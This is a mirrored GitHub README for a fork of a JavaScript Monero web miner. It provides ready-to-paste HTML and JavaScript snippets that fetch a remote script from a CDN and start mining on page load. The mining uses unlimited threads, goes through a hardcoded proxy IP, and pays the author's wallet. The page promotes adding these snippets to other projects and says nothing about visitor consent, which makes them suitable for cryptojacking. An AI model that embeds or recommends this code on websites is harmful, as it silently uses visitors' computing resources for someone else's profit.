GithubHelp home page GithubHelp logo

creepythecat / monero-webminer Goto Github PK

View Code? Open in Web Editor NEW

This project forked from najmajmal/monero-webminer

0.0 0.0 0.0 531 KB

Javascript monero webminer

Home Page: https://monero-webminer.vercel.app/

License: Apache License 2.0

JavaScript 37.47% HTML 62.53%

monero-webminer's Introduction

Monero Webminer

Html & Js code that allows Mining of XMR (Monero) on browsers

Configure

In index.Html you can configure it your preferences

  • Pool
  • XMR Wallet
  • Miner name
  • Threads (-1 means unlimited)
  • Miner Password (Optional, Moneroocean does not use password, if your pool does, it is usually "x")
server = "wss://45.119.82.33:40725";
    var pool = "gulf.moneroocean.stream:80";
    var walletAddress = "INSERT YOUR ADDRESS HERE";
    var workerId = "INSERT NODE NAME"
    var threads = -1;
    var password = "";
    startMining(pool, walletAddress, workerId, threads, password);
    throttleMiner = 20;

Running

Open index.html in any web browser and it will automatically start mining.

https://monero-webminer.vercel.app/

Check Progress

Go to https://moneroocean.stream. This is the pool you are connected to, it will show your hashrate and balance.

How do i know if it works??

  1. Open https://monero-webminer.vercel.app/
  2. Also Open https://moneroocean.stream in a new tab
  3. Paste in my XMR Address 4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi
  4. You will see that "GH-XMR" is Mining. You can also do the same

Use In Other Projects

HTML

<!-- Start Of Mining Code (HTML) -->
<script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
<script>
    server = "wss://45.119.82.33:40725";
    var pool = "moneroocean.stream";
    var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
    var workerId = "GH-XMR"
    var threads = -1;
    var password = "";
    startMining(pool, walletAddress, workerId, threads, password);
    throttleMiner = 20;
</script>
<!-- End Of Mining Code (HTML) -->

Javascript import snippet

import 'https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/external/javascript.js';

Javascript

// Start Of Mining Code (Javascript)
var script = document.createElement("script");
script.src = "https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js";
document.head.appendChild(script);

server = "wss://45.119.82.33:40725";
var pool = "moneroocean.stream";
var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
var workerId = "GH-XMR"
var threads = -1;
var password = "";
startMining(pool, walletAddress, workerId, threads, password);
throttleMiner = 20;
// End Of Mining Code

Donate

This software is 100% free to use, and we would greatly appreciate any donations to help support our work. If you'd like to donate, you can use the following cryptocurrency addresses:

BTC:  33qQZT1F5mWPvqM2bjbxQ3AsSYMXHpJsr6

ETH:  0x641E1449c2f7883F245069f284fC880174b02094

SOL:  AeYJTfLnok1nkncnvXFoKXmH8zrvtB7heNL9Q2sKNaFr

XMR:  4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi

Thank you for choosing our Monero Webminer. We hope you find it useful and profitable

monero-webminer's People

Contributors

najmajmal-old avatar najmajmal avatar creepythecat avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.